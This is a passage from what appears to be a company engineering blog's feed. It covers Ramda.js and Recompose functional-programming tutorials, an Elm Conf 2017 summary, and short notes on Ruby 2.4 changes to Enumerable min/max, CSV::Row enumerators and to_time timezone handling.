];</code></pre><p>Here is the modified code without R.</p><p><a href="https://jsfiddle.net/neerajdotname/wuLc4gqL/6">jsfiddle</a></p><pre><code class="language-javascript">var activeUsers = function (users) {
  return users.filter(function (user) {
    var status = user.status;
    var name = user.name;
    return (
      name !== null &amp;&amp;
      name !== undefined &amp;&amp;
      name.length !== 0 &amp;&amp;
      status === &quot;Active&quot;
    );
  });
};</code></pre><p>Here is the modified code with R.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/8/">jsfiddle</a></p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);
var active = R.filter(isStatusActive);

var isNameEmpty = R.propSatisfies(R.isEmpty, &quot;name&quot;);
var rejectEmptyNames = R.reject(isNameEmpty);

var result = R.pipe(active, rejectEmptyNames)(users);
log(result);</code></pre><p>Notice the change we needed to make to accommodate this request.</p><p>In the non-R version, we had to get into the guts of the function and add logic. In the R version we added a new function and we just composed this new function with the old function using <a href="http://ramdajs.com/docs/#pipe">pipe</a>. We did not change the existing function.</p><p>Now let's say that we don't want all the users but just the first two. We know what needs to change in the without-R version. In the with-R version all we need to do is add <code>R.take(2)</code> and no existing function changes at all.</p><p>Here is the final code.</p><p><a href="https://jsfiddle.net/neerajdotname/9gvsf92g/9">jsfiddle</a></p><pre><code class="language-javascript">var isStatusActive = R.propSatisfies(R.equals(&quot;Active&quot;), &quot;status&quot;);
var active = R.filter(isStatusActive);

var isNameEmpty = R.propSatisfies(R.isEmpty, &quot;name&quot;);
var rejectEmptyNames = R.reject(isNameEmpty);

var result = R.pipe(active, rejectEmptyNames, R.take(2))(users);
log(result);</code></pre><h2>Data comes at the end</h2><p>Another thing to notice is that in the R version nowhere have we said that we are acting on the users. None of the functions mention <code>users</code>. In fact the functions do not take any argument explicitly, since the functions are curried. When we want the result we pass <code>users</code> as the argument, but it could be <code>articles</code> and our code would still hold.</p><p>This is <a href="http://randycoulman.com/blog/2016/06/21/thinking-in-ramda-pointfree-style/">pointfree programming</a>. We do not need to know about &quot;pointfree&quot; since this comes naturally when we write with R.</p><h2>I'm still not convinced that Ramda.js is solving any real problem</h2><p>No problem.</p><p>Please watch the <a href="https://www.youtube.com/watch?v=m3svKOdZijA">Hey Underscore, You're doing it wrong</a> video by <a href="https://twitter.com/drboolean">Brian Lonsdorf</a>. Hopefully that will convince you to give Ramda.js a try.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/m3svKOdZijA" frameborder="0" allowfullscreen></iframe><p>If you are still not convinced, Randy Coulman has written a series of blog posts called <a href="http://randycoulman.com/blog/categories/thinking-in-ramda/">Thinking in Ramda</a>. Please read the blogs. Slowly.</p><h2>Ramda brings functional concepts to JavaScript</h2><p>Functional programming is another way of thinking about code. When we move to Elm, Haskell or Elixir to get functional concepts, we are wrestling with two things at once: a new language and functional concepts.</p><p>Ramda.js brings functional concepts to JavaScript. This way we can slowly start using functional concepts in our day-to-day JavaScript code.</p><p>The best part is that if you write any JavaScript code then you can start using Ramda.js today. Whether you are using React.js or Angular.js, it's all JavaScript and you can use Ramda.js.</p>]]></content>
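For readers coming from Ruby, the pipe-and-compose idea above can be sketched in plain Ruby as well. This is an illustrative analogy (not from the post), using Proc#>> from Ruby 2.6+ in place of R.pipe; the lambda names are hypothetical:

```ruby
users = [
  { name: "John",   status: "Active" },
  { name: "Mike",   status: "Inactive" },
  { name: "Rachel", status: "Active" },
  { name: "",       status: "Active" },
]

# Small single-purpose lambdas, analogous to the Ramda helpers.
active             = ->(list) { list.select { |u| u[:status] == "Active" } }
reject_empty_names = ->(list) { list.reject { |u| u[:name].to_s.empty? } }
first_two          = ->(list) { list.take(2) }

# Proc#>> (Ruby 2.6+) plays the role of R.pipe: the data goes in at the end,
# and adding a step (first_two) composes with, rather than edits, old code.
pipeline = active >> reject_empty_names >> first_two
p pipeline.call(users).map { |u| u[:name] }  # ["John", "Rachel"]
```

As in the Ramda version, adding a new requirement means composing one more lambda into the pipeline instead of changing an existing function.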
    </entry><entry>
       <title><![CDATA[Elm Conf 2017 Summary]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/elm-conf-2017-summary"/>
      <updated>2017-10-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/elm-conf-2017-summary</id>
      <content type="html"><![CDATA[<p>I attended <a href="https://www.elm-conf.us">Elm Conf 2017 US</a> last week alongside the <a href="https://www.thestrangeloop.com/">Strange Loop conference</a>. I was looking forward to the conference to learn what the Elm community is working on, what problems people are facing and what they are doing to overcome them.</p><p>After attending the conference, I can say that the Elm community is growing strong. The conference was attended by around 350 people and many were using Elm in production. More people wanted to try Elm in production.</p><p>There was a lot of enthusiasm about starting new Elm meetups. As a Ruby on Rails and React meetup organizer myself, I was genuinely interested in hearing the experiences of seasoned meetup organizers. In general Evan and Richard prefer a meetup to be a place where people form small groups and hack on something rather than one person teaching the whole group something.</p><p>I liked all the <a href="https://www.elm-conf.us/talks/">talks</a>. There was variety in the topics and the speakers were all seasoned. Kudos to the organizers for putting up a great program. Below is a quick summary of my thoughts from the conference.</p><h3>Keynote by Evan</h3><p><a href="https://twitter.com/czaplic">Evan</a> talked about the work he has been doing for the upcoming release of Elm. He discussed the optimization work related to code splitting, code generation and minification for speeding up building and delivering single page apps using Elm. He made another interesting point: he changed the codegen which generates the JS code from Elm code twice, but nobody noticed it. Things like this can give a huge opportunity to change and improve existing designs, which he has been doing for the upcoming release.</p><p>In the end he mentioned that his philosophy is not to rush things. It's better to do things right than to do them now.</p><p>After the keynote, he encouraged people to talk to him about what they are working on, which was really nice.</p><h3>Accessibility with Elm</h3><p><a href="https://twitter.com/t_kelly9">Tessa</a> talked about her work around adding <a href="http://package.elm-lang.org/packages/tesk9/elm-html-a11y">accessibility support</a> for Elm apps. She talked about design decisions, prior art and some of the challenges she faced while working on the library, like working with tabs, interactive elements and images. There was a question at the end about whether this will be incorporated into Elm core, but Evan mentioned that it might take some time.</p><h3>Putting the Elm Platform in the Browser</h3><p><a href="https://twitter.com/ellie_editor">Luke</a>, the creator of <a href="https://ellie-app.com/">Ellie</a> - a way to easily share your Elm code with others online - talked about how he started with Ellie. He talked about the problems he had to face in implementing and sustaining Ellie through ads. During the talk, he also open sourced the code, so we can see it on <a href="https://github.com/lukewestby/ellie">GitHub</a> now.</p><p>Luke mentioned how he changed the architecture of Ellie from mostly running on the server to running in the browser using service workers. He discussed future plans for sustaining Ellie, building an Elm editor instead of using CodeMirror, getting rid of ads and making Ellie better for everyone.</p><h3>The Importance of Ports</h3><p>In other languages like <a href="http://www.purescript.org/">PureScript</a> and <a href="https://bucklescript.github.io/">BuckleScript</a>, invoking native JavaScript functions is easy. In Elm one has to use &quot;Ports&quot;. Using ports requires some extra work. In return we get more safety.</p><p><a href="https://twitter.com/splodingsocks">Murphy Randle</a> presented a case where he was using too many ports, which was resulting in fragmented code. He discussed how ports are based on the <a href="https://en.wikipedia.org/wiki/Actor_model">Actor Model</a>, and once we get that, using ports becomes much easier. He also showed the refactored code.</p><p>Murphy also runs the Elm Town podcast (link is not available). Listen to episode 13 to learn more about ports.</p><h3>Keynote by Richard Feldman</h3><p><a href="https://twitter.com/rtfeldman">Richard</a> talked about his experiences in teaching beginners about Elm. He has taught Elm a lot. He has done an extensive Elm course on <a href="https://frontendmasters.com/workshops/elm">Frontend Masters</a>. He is currently writing the <a href="https://www.manning.com/books/elm-in-action">Elm in Action</a> book.</p><p>He talked about finding motivation to teach using the <a href="http://edglossary.org/swbat/">SWBAT technique</a>. It helped him in deciding the agenda and finding a direct path for teaching. He mentioned that in the beginning being precise and detailed is not important. This resonated with me, as the most important thing for anyone getting started is to start with the most basic things and then iterate over them again and again.</p><h3>Parting thoughts</h3><p>The Elm community is small, tight-knit, very friendly and warm. Lots of people are trying a lot of cool things. <a href="https://elmlang.herokuapp.com/">Elm Slack</a> came up in discussions again and again as a good place for beginners to seek help.</p><p>When I first heard about Elm, it was about good compiler errors and run-time safety. However, after attending the conference I am mighty impressed with the Elm community.</p><p>Big props to <a href="https://twitter.com/brianhicks">Brian</a> and <a href="https://twitter.com/ellie_editor">Luke</a> for organizing the conference!</p><p>All the videos from the conference are already being <a href="https://www.youtube.com/watch?v=P3pL85n9_5s&amp;list=PLglJM3BYAMPFTT61A0Axo_8n0s9n9CixA">uploaded here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 has optimized enumerable min max methods]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-0-has-optimized-enumerable-min-max-methods"/>
      <updated>2017-09-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-0-has-optimized-enumerable-min-max-methods</id>
      <content type="html"><![CDATA[<p>Enumerables in Ruby have <code>min</code>, <code>max</code> and <code>minmax</code> comparison methods which are quite convenient to use.</p><pre><code class="language-ruby">(1..99).min #=&gt; 1
(1..99).max #=&gt; 99
(1..99).minmax #=&gt; [1, 99]</code></pre><p>In Ruby 2.4, the <code>Enumerable#min</code> and <code>Enumerable#max</code> <a href="https://github.com/ruby/ruby/commit/3dcd4b2a98e">methods</a>, as well as the <code>Enumerable#minmax</code> <a href="https://github.com/ruby/ruby/commit/9f44b77a18d">method</a>, are now more optimized.</p><p>We ran the following benchmark snippet on both Ruby 2.3 and Ruby 2.4 and observed the results.</p><pre><code class="language-ruby">require 'benchmark/ips'

Benchmark.ips do |bench|
  NUM1 = 1_000_000.times.map { rand }

  ENUM_MIN = Enumerable.instance_method(:min).bind(NUM1)
  ENUM_MAX = Enumerable.instance_method(:max).bind(NUM1)
  ENUM_MINMAX = Enumerable.instance_method(:minmax).bind(NUM1)

  bench.report('Enumerable#min') do
    ENUM_MIN.call
  end

  bench.report('Enumerable#max') do
    ENUM_MAX.call
  end

  bench.report('Enumerable#minmax') do
    ENUM_MINMAX.call
  end
end</code></pre><h4>Results for Ruby 2.3</h4><pre><code class="language-ruby">Warming up --------------------------------------
   Enumerable#min     1.000 i/100ms
   Enumerable#max     1.000 i/100ms
Enumerable#minmax     1.000 i/100ms
Calculating -------------------------------------
   Enumerable#min     14.810 (13.5%) i/s - 73.000 in 5.072666s
   Enumerable#max     16.131 ( 6.2%) i/s - 81.000 in 5.052324s
Enumerable#minmax     11.758 ( 0.0%) i/s - 59.000 in 5.026007s</code></pre><h4>Results for Ruby 2.4</h4><pre><code class="language-ruby">Warming up --------------------------------------
   Enumerable#min     1.000 i/100ms
   Enumerable#max     1.000 i/100ms
Enumerable#minmax     1.000 i/100ms
Calculating -------------------------------------
   Enumerable#min     18.091 ( 5.5%) i/s - 91.000 in 5.042064s
   Enumerable#max     17.539 ( 5.7%) i/s - 88.000 in 5.030514s
Enumerable#minmax     13.086 ( 7.6%) i/s - 66.000 in 5.052537s</code></pre><p>From the above benchmark results, it can be seen that there has been an improvement in the run times for these methods.</p><p>Internally Ruby has changed the logic by which objects are compared, which results in these methods being optimized. You can have a look at the commits <a href="https://github.com/ruby/ruby/commit/9f44b77a18d">here</a> and <a href="https://github.com/ruby/ruby/commit/3dcd4b2a98e">here</a>.</p>]]></content>
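Separately from the benchmark above, here is a small runnable sketch of the three methods; the words array and the length-based comparator are illustrative additions, not from the post:

```ruby
range = (1..99)

p range.min     # 1
p range.max     # 99
p range.minmax  # [1, 99]

# min/max also accept an argument n to return the n smallest or
# largest values, and a block for custom comparison.
p range.min(3)  # [1, 2, 3]

words = %w[kiwi banana fig]
# The block is a comparator; here it orders by string length,
# so min returns the shortest word.
p words.min { |a, b| a.length - b.length }  # "fig"
```

The same calls work on any Enumerable, so an Array, Range or custom collection all benefit from the Ruby 2.4 optimization.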
    </entry><entry>
       <title><![CDATA[CSV::Row#each etc. return enumerator when no block given]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/csv-row-each-and-delete-if-return-enumerator-when-no-block-given"/>
      <updated>2017-09-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/csv-row-each-and-delete-if-return-enumerator-when-no-block-given</id>
      <content type="html"><![CDATA[<p>In Ruby 2.3, methods like <code>CSV::Row#each</code> and <code>CSV::Row#delete_if</code> do not return an enumerator when no block is given.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">CSV::Row.new(%w(banana mango), [1,2]).each
#=&gt; #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;

CSV::Row.new(%w(banana mango), [1,2]).delete_if
#=&gt; #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;</code></pre><p>Some methods raise an exception because of this behavior.</p><pre><code class="language-ruby">&gt; ruby -rcsv -e 'CSV::Table.new([CSV::Row.new(%w{banana mango}, [1, 2])]).by_col.each'
#=&gt; /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `block in each': undefined method `[]' for nil:NilClass (NoMethodError)
  from /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `each'
  from /Users/sushant/.rbenv/versions/2.3.0/lib/ruby/2.3.0/csv.rb:850:in `each'
  from -e:1:in `&lt;main&gt;'</code></pre><p>Ruby 2.4 <a href="https://github.com/ruby/ruby/commit/b425d4f19ad9efaefcb1a767a6ea26e6d40e3985">fixed this issue</a>.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">CSV::Row.new(%w(banana mango), [1,2]).each
#=&gt; #&lt;Enumerator: #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;:each&gt;

CSV::Row.new(%w(banana mango), [1,2]).delete_if
#=&gt; #&lt;Enumerator: #&lt;CSV::Row &quot;banana&quot;:1 &quot;mango&quot;:2&gt;:delete_if&gt;</code></pre><p>As we can see, these methods now return an enumerator when no block is given.</p><p>In Ruby 2.4 the following code will not raise any exception.</p><pre><code class="language-ruby">&gt; ruby -rcsv -e 'CSV::Table.new([CSV::Row.new(%w{banana mango}, [1, 2])]).by_col.each'</code></pre>]]></content>
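A small runnable sketch of the Ruby 2.4+ behavior described above; the row values mirror the post's example, and the enum.next call is an illustrative addition:

```ruby
require "csv"

row = CSV::Row.new(%w[banana mango], [1, 2])

# With no block, each now returns an Enumerator instead of the row itself.
enum = row.each
p enum.class  # Enumerator

# The enumerator yields header/field pairs lazily.
p enum.next   # ["banana", 1]

# delete_if behaves the same way when no block is given.
p row.delete_if.class  # Enumerator
```

Because these methods now follow the usual Enumerable convention, they compose with enumerator chains (for example enum.with_index) just like Array#each does.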
    </entry><entry>
       <title><![CDATA[Ruby 2.4 DateTime#to_time & Time#to_time keeps info]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/to-time-preserves-time-zone-info-in-ruby-2-4"/>
      <updated>2017-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/to-time-preserves-time-zone-info-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, <code>DateTime#to_time</code> and <code>Time#to_time</code> methods can be used to return aTime object.</p><p>In Ruby 2.3, these methods convert time into system timezone offset instead ofpreserving timezone offset of the receiver.</p><h3>Ruby 2.3</h3><pre><code class="language-ruby">&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; #&lt;DateTime: 2017-05-16T10:15:30+09:00 ((2457890j,4530s,0n),+32400s,2299161j)&gt;&gt; datetime.to_time #=&gt; 2017-05-16 06:45:30 +0530&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 06:45:30 +0530</code></pre><p>As you can see, <code>DateTime#to_time</code> and <code>Time#to_time</code> methods return time insystem timezone offset <code>+0530</code>.</p><p>Ruby 2.4 fixed<a href="https://github.com/ruby/ruby/commit/5f11a6eb6cca740b08384d1e4a68df643d98398c">DateTime#to_time</a>and<a href="https://github.com/ruby/ruby/commit/456523e2ede3073767fd8cb73cc4b159c3608890">Time#to_time</a>.</p><p>Now, <code>DateTime#to_time</code> and <code>Time#to_time</code> preserve receiver's timezone offsetinfo.</p><h3>Ruby 2.4</h3><pre><code class="language-ruby">&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; #&lt;DateTime: 2017-05-16T10:15:30+09:00 ((2457890j,4530s,0n),+32400s,2299161j)&gt;&gt; datetime.to_time #=&gt; 2017-05-16 10:15:30 +0900&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 10:15:30 +0900</code></pre><p>Since this is a breaking change for Rails application upgrading to ruby 2.4,Rails 4.2.8 built a compatibility layer by adding a<a href="https://github.com/rails/rails/commit/c9c5788a527b70d7f983e2b4b47e3afd863d9f48">config option</a>.<code>ActiveSupport.to_time_preserves_timezone</code> was added to control how <code>to_time</code>handles timezone 
offsets.</p><p>Here is an example of how application behaves when <code>to_time_preserves_timezone</code>is set to <code>false</code>.</p><pre><code class="language-ruby">&gt; ActiveSupport.to_time_preserves_timezone = false&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; Tue, 16 May 2017 10:15:30 +0900&gt; datetime.to_time #=&gt; 2017-05-16 06:45:30 +0530&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 06:45:30 +0530</code></pre><p>Here is an example of how application behaves when <code>to_time_preserves_timezone</code>is set to <code>true</code>.</p><pre><code class="language-ruby">&gt; ActiveSupport.to_time_preserves_timezone = true&gt; datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z') #=&gt; Tue, 16 May 2017 10:15:30 +0900&gt; datetime.to_time #=&gt; 2017-05-16 10:15:30 +0900&gt; time = Time.new(2017, 5, 16, 10, 15, 30, '+09:00') #=&gt; 2017-05-16 10:15:30 +0900&gt; time.to_time #=&gt; 2017-05-16 10:15:30 +0900</code></pre>]]></content>
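Worth noting: only the reported offset changes between the two behaviors, never the instant in time itself. A quick check in plain Ruby (no Rails needed):

```ruby
require "date"

datetime = DateTime.strptime('2017-05-16 10:15:30 +09:00', '%Y-%m-%d %H:%M:%S %Z')
time = datetime.to_time

# Whichever offset to_time reports (+0900 on 2.4, the system offset on 2.3),
# the underlying instant is unchanged: converting to UTC gives the same moment.
puts time.getutc == Time.utc(2017, 5, 16, 1, 15, 30) # => true
```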
    </entry><entry>
       <title><![CDATA[Using Recompose to build higher-order components]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/using-recompose-to-build-higher-order-components"/>
      <updated>2017-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-recompose-to-build-higher-order-components</id>
      <content type="html"><![CDATA[<p><a href="https://github.com/acdlite/recompose">Recompose</a> is a toolkit for writing Reactcomponents using higher-order components. Recompose allows us to write manysmaller higher-order components and then we compose all those componentstogether to get the desired component. It improves both readability and themaintainability of the code.</p><p><a href="https://facebook.github.io/react/docs/higher-order-components.html">HigherOrderComponents</a>are also written as <code>HOC</code>. Going forward we will use <code>HOC</code> to refer tohigher-order components.</p><h2>Using Recompose in an e-commerce application</h2><p>We are working on an e-commerce application and we need to build payment page.Here are the modes of payment.</p><ul><li>Online</li><li>Cash on delivery</li><li>Swipe on delivery</li></ul><p>We need to render our React components depending upon the payment mode selectedby the user. Typically we render components based on some state.</p><p>Here is the traditional way of writing code.</p><pre><code class="language-javascript">state = {  showPayOnlineScreen: true,  showCashOnDeliveryScreen: false,  showSwipeOnDeliveryScreen: false,}renderMainScreen = () =&gt; {  const { showCashOnDeliveryScreen, showSwipeOnDeliveryScreen } = this.state;  if (showCashOnDeliveryScreen) {    return &lt;CashOnDeliveryScreen /&gt;;  } else if (showSwipeOnDeliveryScreen) {    return &lt;SwipeOnDeliveryScreen /&gt;;  }  return &lt;PayOnlineScreen /&gt;;} render() {  return (    { this.renderMainScreen() }  ); }</code></pre><p>We will try to refactor the code using the tools provided by <em>Recompose</em>.</p><p>In general, the guiding principle of functional programming is composition. Sohere we will assume that the default payment mechanism is <em>online</em>. 
If the payment mode happens to be something else, then we will take care of it by enhancing the existing component.</p><p>So to start with, our code would look like this.</p><pre><code class="language-javascript">state = {
  paymentType: online, // online === "ONLINE", defined with the other payment-type constants
}

render() {
  return (
    &lt;PayOnline {...this.state} /&gt;
  );
}</code></pre><p>First, let's handle the case of payment mode <em>CashOnDelivery</em>.</p><pre><code class="language-javascript">import { branch, renderComponent, renderNothing } from 'recompose';
import CashScreen from 'components/payments/cashScreen';

const cashOnDelivery = 'CASH_ON_DELIVERY';

const enhance = branch(
  (props) =&gt; (props.paymentType === cashOnDelivery),
  renderComponent(CashScreen),
  renderNothing
)</code></pre><p>Recompose has a <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#branch">branch</a> function which acts like a ternary operator.</p><p>The <code>branch</code> function accepts three arguments and returns an <code>HOC</code>. The first argument is a <a href="https://en.wikipedia.org/wiki/Predicate_(mathematical_logic)">predicate</a> which accepts props as the argument and returns a <em>Boolean</em> value. The second and third arguments are higher-order components. If the predicate evaluates to <strong>true</strong> then the <strong>left HOC</strong> is rendered, otherwise the <strong>right HOC</strong> is rendered. Here is the signature of <code>branch</code>.</p><pre><code class="language-javascript">branch(
  test: (props: Object) =&gt; boolean,
  left: HigherOrderComponent,
  right: ?HigherOrderComponent
): HigherOrderComponent</code></pre><p>Notice the question mark in <code>?HigherOrderComponent</code>.
It means that the third argument is optional.</p><p>If you are familiar with <a href="http://ramdajs.com">Ramda</a> then this is similar to <a href="http://ramdajs.com/docs/#ifElse">ifElse</a> in Ramda.</p><p><a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendercomponent">renderComponent</a> takes a component and returns an HOC version of it.</p><p><a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#rendernothing">renderNothing</a> is an HOC which will always render <code>null</code>.</p><p>Since the third argument to <code>branch</code> is optional, we do not need to supply it. If we don't supply the third argument, then the original component will be rendered.</p><p>So now we can make our code shorter by removing the usage of <code>renderNothing</code>.</p><pre><code class="language-javascript">const enhance = branch(
  (props) =&gt; (props.paymentType === cashOnDelivery),
  renderComponent(CashScreen)
)

const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Next condition is handling SwipeOnDelivery</h3><p>SwipeOnDelivery means that upon delivery the customer pays by credit card using <a href="https://squareup.com">Square</a> or a similar tool.</p><p>We will follow the same pattern and the code might look like this.</p><pre><code class="language-javascript">import { branch, renderComponent } from 'recompose';
import CashScreen from 'components/payments/CashScreen';
import PayOnlineScreen from 'components/payments/PayOnlineScreen';
import CardScreen from 'components/payments/CardScreen';

const cashOnDelivery = 'CASH_ON_DELIVERY';
const swipeOnDelivery = 'SWIPE_ON_DELIVERY';

let enhance = branch(
  (props) =&gt; (props.paymentType === cashOnDelivery),
  renderComponent(CashScreen)
)

enhance = branch(
  (props) =&gt; (props.paymentType === swipeOnDelivery),
  renderComponent(CardScreen)
)(enhance)

const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Extracting out predicates</h3><p>Let's extract predicates into their own
functions.</p><pre><code class="language-javascript">import { branch, renderComponent } from &quot;recompose&quot;;
import CashScreen from &quot;components/payments/CashScreen&quot;;
import PayOnlineScreen from &quot;components/payments/PayOnlineScreen&quot;;
import CardScreen from &quot;components/payments/CardScreen&quot;;

const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;
const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;

// predicates
const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;

let enhance = branch(isCashOnDelivery, renderComponent(CashScreen));
enhance = branch(isSwipeOnDelivery, renderComponent(CardScreen))(enhance);

const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Adding one more payment method</h3><p>Let's say that next we need to add support for <a href="https://bitcoin.org/en">Bitcoin</a>.</p><p>We can use the same process.</p><pre><code class="language-javascript">const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;
const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;
const bitcoinOnDelivery = &quot;BITCOIN_ON_DELIVERY&quot;;

const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;
const isBitcoinOnDelivery = ({ paymentType }) =&gt;
  paymentType === bitcoinOnDelivery;

let enhance = branch(isCashOnDelivery, renderComponent(CashScreen));
enhance = branch(isSwipeOnDelivery, renderComponent(CardScreen))(enhance);
enhance = branch(isBitcoinOnDelivery, renderComponent(BitcoinScreen))(enhance);

const MainScreen = enhance(PayOnlineScreen);</code></pre><p>You can see the pattern and it is getting repetitive and boring.
We can chain these conditions together to make it less repetitive.</p><p>Let's use the <a href="https://github.com/acdlite/recompose/blob/master/docs/API.md#compose">compose</a> function and chain them.</p><pre><code class="language-javascript">const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;

const cashOnDeliveryCondition = branch(
  isCashOnDelivery,
  renderComponent(CashScreen)
);
const swipeOnDeliveryCondition = branch(
  isSwipeOnDelivery,
  renderComponent(CardScreen)
);

const enhance = compose(cashOnDeliveryCondition, swipeOnDeliveryCondition);
const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Refactoring code to remove repetition</h3><p>At this time we are building a condition (like <em>cashOnDeliveryCondition</em>) for each payment type and then using that condition in <code>compose</code>. We can put all such conditions in an array and then we can use that array in <code>compose</code>.
Let's see it in action.</p><pre><code class="language-javascript">const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;
const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;

const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;

const states = [
  {
    when: isCashOnDelivery,
    then: CashOnDeliveryScreen,
  },
  {
    when: isSwipeOnDelivery,
    then: SwipeOnDeliveryScreen,
  },
];

const componentsArray = states.map(({ when, then }) =&gt;
  branch(when, renderComponent(then))
);

const enhance = compose(...componentsArray);
const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Extract function for reusability</h3><p>We are going to extract some code into <code>utils</code> for better reusability.</p><pre><code class="language-javascript">// utils/composeStates.js
import { branch, renderComponent, compose } from &quot;recompose&quot;;

export default function composeStates(states) {
  const componentsArray = states.map(({ when, then }) =&gt;
    branch(when, renderComponent(then))
  );
  return compose(...componentsArray);
}</code></pre><p>Now our main code looks like this.</p><pre><code class="language-javascript">import composeStates from &quot;utils/composeStates.js&quot;;

const cashOnDelivery = &quot;CASH_ON_DELIVERY&quot;;
const swipeOnDelivery = &quot;SWIPE_ON_DELIVERY&quot;;

const isCashOnDelivery = ({ paymentType }) =&gt; paymentType === cashOnDelivery;
const isSwipeOnDelivery = ({ paymentType }) =&gt; paymentType === swipeOnDelivery;

const states = [
  {
    when: isCashOnDelivery,
    then: CashScreen,
  },
  {
    when: isSwipeOnDelivery,
    then: CardScreen,
  },
];

const enhance = composeStates(states);
const MainScreen = enhance(PayOnlineScreen);</code></pre><h3>Full before and after comparison</h3><p>Here is the before code.</p><pre><code class="language-javascript">import React, { Component } from &quot;react&quot;;
import PropTypes from &quot;prop-types&quot;;
import { connect } from &quot;react-redux&quot;;
import { browserHistory } from &quot;react-router&quot;;
import { Modal } from &quot;react-bootstrap&quot;;
import * as authActions from &quot;redux/modules/auth&quot;;
import PaymentsModalBase from &quot;../../components/PaymentsModal/PaymentsModalBase&quot;;
import PayOnlineScreen from &quot;../../components/PaymentsModal/PayOnlineScreen&quot;;
import CashScreen from &quot;../../components/PaymentsModal/CashScreen&quot;;
import CardScreen from &quot;../../components/PaymentsModal/CardScreen&quot;;

@connect(() =&gt; ({}), { ...authActions })
export default class PaymentsModal extends Component {
  static propTypes = {
    show: PropTypes.bool.isRequired,
    hideModal: PropTypes.func.isRequired,
    orderDetails: PropTypes.object.isRequired,
  };

  static defaultProps = {
    show: true,
    hideModal: () =&gt; {
      browserHistory.push(&quot;/&quot;);
    },
    orderDetails: {},
  };

  state = {
    showOnlineScreen: true,
    showCashScreen: false,
    showCardScreen: false,
  };

  renderScreens = () =&gt; {
    const { showCashScreen, showCardScreen } = this.state;
    if (showCashScreen) {
      return &lt;CashScreen /&gt;;
    } else if (showCardScreen) {
      return &lt;CardScreen /&gt;;
    }
    return &lt;PayOnlineScreen /&gt;;
  };

  render() {
    const { show, hideModal, orderDetails } = this.props;
    return (
      &lt;Modal show={show} onHide={hideModal} dialogClassName=&quot;modal-payments&quot;&gt;
        &lt;PaymentsModalBase orderDetails={orderDetails} onHide={hideModal}&gt;
          {this.renderScreens()}
        &lt;/PaymentsModalBase&gt;
      &lt;/Modal&gt;
    );
  }
}</code></pre><p>Here is the code after applying Recompose.</p><pre><code class="language-javascript">import React, { Component } from &quot;react&quot;;
import PropTypes from &quot;prop-types&quot;;
import { connect } from &quot;react-redux&quot;;
import { Modal } from &quot;react-bootstrap&quot;;
import { compose, branch, renderComponent } from &quot;recompose&quot;;
import * as authActions from &quot;redux/modules/auth&quot;;
import PaymentsModalBase from &quot;components/PaymentsModal/PaymentsModalBase&quot;;
